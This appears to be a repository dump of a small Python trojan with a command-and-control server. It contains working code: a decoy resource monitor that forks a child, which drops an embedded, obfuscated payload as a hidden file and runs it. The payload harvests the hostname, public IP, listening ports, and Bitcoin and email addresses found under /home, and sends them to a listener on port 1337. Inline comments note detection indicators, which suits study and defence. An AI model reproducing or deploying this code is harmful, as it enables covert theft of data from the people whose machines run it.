├── README.md ├── c2-server └── c2-server.py ├── test-data ├── my_bitcoin_addresses.txt └── my_emails.txt └── trojan ├── malware.py ├── malware.py.gz └── trojan.py
/README.md:
--------------------------------------------------------------------------------
## A simple implementation of a trojan malware in python with a C2 ( command and control ) server
--------------------------------------------------------------------------------
/c2-server/c2-server.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3
# Receiver ("command and control") side of the sample in trojan/.
# Listens on loopback TCP 1337, handles one connection at a time, reads a
# single base64 payload from it and writes the decoded text to a randomly
# named file in the current working directory. Nothing is sent back to the
# client; there is no authentication and no framing of the payload.
import socket
import base64
import random
from string import ascii_lowercase

# create TCP socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# listen on localhost port 1337
# NOTE(review): bound to 127.0.0.1 only. trojan/malware.py also connects to
# 127.0.0.1:1337, so as written the two halves only talk on the same host.
s.bind(("127.0.0.1", 1337))

# queue up to 5 requests
s.listen(5)

print("listening on port 1337...")

while True:
    # establish a connection
    clientsocket, client_ip = s.accept()
    print("[+] received a connection from -> {}".format(client_ip))

    # get the encoded data
    # One recv(4096) and the connection is closed: whatever the client sent
    # beyond the first read is never consumed.
    encoded_data = clientsocket.recv(4096)
    clientsocket.close()

    # open a file with a random name and insert the decoded data into it
    # File name = 10 random lowercase letters, created in the CWD of the
    # server process (opened in text mode). The payload is base64-decoded
    # and UTF-8-decoded with no error handling, so a malformed payload
    # raises here and terminates the script (the loop has no try/except).
    random_fd = open("".join(random.choices(ascii_lowercase, k = 10)), "w")
    random_fd.write(base64.b64decode(encoded_data).decode("UTF-8"))
    random_fd.close()
--------------------------------------------------------------------------------
/test-data/my_bitcoin_addresses.txt:
--------------------------------------------------------------------------------
bc1qv7k79qxgwv6wq02zycd5cju4ymgzxw9c3nevft
bc1qpvyh373y2pds590r9wfw26tavayxkuecmqkuh9
bc1qucum2802f06fzgld80hrtj42lck9ekvlz7ataa
1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2
3FZbgi29cpjq2GjdwV8eyHuJJnkLtktZc5

--------------------------------------------------------------------------------
/test-data/my_emails.txt:
--------------------------------------------------------------------------------
mybusinessemail@company.com
notimportant@important.com
personalemail@home.com

--------------------------------------------------------------------------------
/trojan/malware.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3
# Collector stage of the sample. Profiles the host, walks /home looking for
# strings shaped like Bitcoin and e-mail addresses, lists listening TCP
# sockets, and ships everything as base64(JSON) over a single TCP
# connection to the receiver in c2-server/. Observable behaviours that a
# defender can key on are noted inline.
import requests
import socket
import base64
import json
import re
import os


def main():
    # get hostname of the machine
    hostname = socket.gethostname()

    # get the public ipv4 address of the machine
    # Outbound HTTPS request to ipapi.co carrying a fixed, dated Firefox 78
    # User-Agent string: a stable network indicator for this sample. No
    # timeout and no error handling -- a failed request ends the run.
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
    }
    public_ip = requests.get("https://ipapi.co/ip", headers = headers).text

    # search for bitcoin and email addresses
    # Every regular file under /home is opened in text mode and read whole.
    # open() sits outside the try, so a file the process cannot open raises
    # out of main(); a read() that fails (e.g. non-UTF-8 content) is
    # swallowed by the bare except below, which also skips the close() --
    # the handle is then left open until garbage collection.
    # Filesystem telemetry: a python3 process reading across all of /home.
    bitcoin_addresses_list = []
    email_addresses_list = []
    for root, subdirs, files in os.walk("/home"):
        for file in files:
            file_fd = open("{}/{}".format(root, file), "r")
            try:
                # read the contents of each file
                file_contents = file_fd.read().strip()

                # search for bitcoin addresses
                # Accepts 1.../3...-prefixed (legacy-style) and bc1...-prefixed
                # (bech32-style) strings by shape only; no checksum is verified.
                bitcoin_addresses = re.findall(r"([13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})", file_contents)

                # search for email addresses
                # Lowercase-only pattern (no re.IGNORECASE), so mixed-case
                # addresses are not matched.
                email_addresses = re.findall(r"[a-z0-9._]+@[a-z0-9]+\.[a-z]{1,7}", file_contents)

                # check if we have found any bitcoin addresses or emails
                if len(bitcoin_addresses) > 0:
                    bitcoin_addresses_list = bitcoin_addresses_list + bitcoin_addresses
                if len(email_addresses) > 0:
                    email_addresses_list = email_addresses_list + email_addresses

                file_fd.close()
            except:
                pass


    # get all open ports on the machine
    # Spawns a shell pipeline (netstat | grep | awk | grep) through os.popen:
    # process-tree telemetry shows python3 -> sh -> netstat/grep/awk. If
    # netstat (net-tools) is absent the pipeline yields "" and open_ports
    # becomes [""]. The pattern is in a non-raw string, so "\d" and "\." are
    # invalid escape sequences (a SyntaxWarning on 3.12+, DeprecationWarning
    # before); Python leaves them unchanged and the shell sees them as typed.
    open_ports = os.popen("netstat -plant | grep -i listen | awk '{print $4}' | grep -P '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}'").read()
    open_ports = open_ports.strip().split("\n")

    # encode data to json and send them to command and control server
    # Fixed JSON key names -- useful for content-based detection of the
    # payload after base64 decoding.
    data = {
        "machine_hostname": hostname,
        "machine_ip": public_ip,
        "machine_open_ports": open_ports,
        "bitcoin_addresses_found": bitcoin_addresses_list,
        "email_addresses_found": email_addresses_list
    }

    # base64 encode the json data
    encoded_data = base64.b64encode(json.dumps(data).encode())

    # send data to command and control server

    # create a socket object
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    # connect to command and control server on port 1337
    # Hard-coded loopback destination; a single send() with no length prefix
    # and no delivery check. If nothing listens on 127.0.0.1:1337 the
    # connect() raises ConnectionRefusedError and the script exits.
    s.connect(("127.0.0.1", 1337))
    s.send(encoded_data)
    s.close()


if __name__ == "__main__":
    main()
--------------------------------------------------------------------------------
/trojan/malware.py.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leetCipher/python-trojan/2224473682eee4f4dfcd255aa24271ba18e14f5f/trojan/malware.py.gz
--------------------------------------------------------------------------------
/trojan/trojan.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3
# Dropper/decoy stage. The parent process shows a benign-looking resource
# monitor on the console while a forked child writes the embedded payload
# to a hidden file in the current directory and executes it.
import psutil
import base64
import time
import gzip
import os

def main():
    # fork a child process
    # os.fork() is POSIX-only. The parent runs the monitor loop below (and
    # never calls wait(), so a finished child stays a zombie until the
    # parent exits); the child runs trojan().
    pid = os.fork()

    if pid > 0:
        # parent process
        # Decoy: an endless loop printing CPU / RAM / disk / process-count
        # figures from psutil every 2 seconds.
        while True:
            # percentage of used CPU
            cpu = psutil.cpu_percent()
            # percentage of used RAM
            ram = psutil.virtual_memory().percent
            # percentage of used disk space
            disk = psutil.disk_usage("/").percent
            # number of all running processes
            processes_count = 0
            for _ in psutil.process_iter():
                processes_count += 1

            # print to screen
            print("---------------------------------------------------------")
            print("| CPU USAGE | RAM USAGE | DISK USAGE | RUNNING PROCESSES |")
            print("| {:02}% | {:02}% | {:02}% | {} |".format(int(cpu), int(ram), int(disk), processes_count))
            print("---------------------------------------------------------")

            # sleep for 2s
            time.sleep(2)
    else:
        # child process
        trojan()


def trojan():
    # Drops ".malware.py" (dot-prefixed, so hidden from a plain `ls`) in the
    # current working directory of the process. Endpoint telemetry: a python3
    # process creating a hidden .py file and then spawning /usr/bin/python3
    # on it; the dropped file is never deleted, so it remains as an artefact.
    malware_fd = open(".malware.py", "w")
    # Embedded payload: base64 text of a gzip stream, decoded to UTF-8 and
    # written verbatim. NOTE(review): by the repo layout (trojan/malware.py,
    # trojan/malware.py.gz) this is presumably the source of malware.py, but
    # the page does not show the decoded blob -- confirm by decoding it.
    blob = "H4sICAncMmEAA21hbHdhcmUucHkAjVZtb9s2EP7uX3FTB0RCZMmKHadx4WHB0K7d1q5YO2BYEgi0RMesZVIj6cSJ4/++IyX6TXY22bBJ3nMvfHh31Kvv4rmS8YjxuHzUE8G7LTYrhdQg6T9zqrRycyWyKdVuNiKK9ntu9k0JvtFzI6FarVZOxzAjjPvBoAX4vII7qmEilOZkRkGMQU8oIrIJ49Qi1rJh7TNCDbfoB60tM0a1nI8KlgEr73tA8lxSpQ5apSSnUqHRpZ2bx/tTUdm+uqNcewPwPoonVhQkPo864P+VJG/gN8bnC1i87qf93huQ94OL11EngJ9pNhXxWSfp4DeBd0zSsVjERuhZ4yv7W0WWshKdOjbNXnxvonWpBnHMSlKyKBM48MKtEOtREGm60G7DihKZTWAsJIyYzgTjQHgOFNkt3M6psuBanq5X04IpjYavb63c6hyVGg9SCB2Cmo9yJlUIY1ZQBehRqOiBFFPfiydiRr36UJ2WgRmUhW9EVoxL6ThHL6Kk3PeWq3i58iLUmhHtV+4MJgjBk16wo6vl466xihCJLNlzzgTXeIb23CkxHKGhhoKNYA0duogiY8YPIqUlK1167To6xPwO39tPg3t7+tGY8ZwUhS89/zrp3i6T1TVpT2ftp6v2+1/anz63/07al7fLs37Y7a6eR1mC4qeOWepehueXq8ALd3fwX5EeyovtZy8H9qOs3Ufp7emPLpTTm8gMMfjwYvW/4skmWCrAxvBAYULuKUY2x5wl/LHJJLigm7GigQKTpkFtAD9Ap5kaB4/BJfkRwWlTcCyMPeZeCOJInR1cPt1fbvLpMjYrhDKdcMfVIqOlboZREmXacHUcpmfi8doSBNOjkXTeaJVGmlbSoSn4sqpYTrXSREO7LAjX8Ax3kpbQZmDCR3vPQB6mcLIsJUPx973VyRrzGU5ucsya7uomOjoY2P/z1YkX1DV5IJr1xNVrpMqCYUu94XXTqLdKeSZyCjnRBLSwN5Rtl4py2zRmZjUTsxmx+ZjbJiJFgQB5T6W1YpV3LoyaptRdR3htuGHYRGFXH2xugQOAzXYQuJlsIZvZaisI4YfzeEt1P8uc4qHsq2+tmrvqcncUmvSw9Bk6quvDCvK05qeCR6N+rxL4Bh3l81mpfAMJono9CDZ3GTLuzuaFU6jhGeaDpkDqFwIQo280q4JWm9eE6s+vZ1fv0g+f3n4NnfTL7z/9mn75+sfbq4/rMNAbR0MvB2FKxL7PJN3uReUzqhV930vOLqIOfhLshwYQBDXEbNHfZsoJXPW2WthP0tTkTprCcAhempo3pTT1qjKuXpv+BfXo/OqiCQAA"
    malware = gzip.decompress(base64.b64decode(blob)).decode("UTF-8")
    malware_fd.write(malware)
    malware_fd.close()

    # execute malware
    # os.system() runs the command through /bin/sh; the child blocks here
    # until the dropped script exits. The interpreter path is hard-coded.
    os.system("/usr/bin/python3 .malware.py")


if __name__ == "__main__":
    main()
--------------------------------------------------------------------------------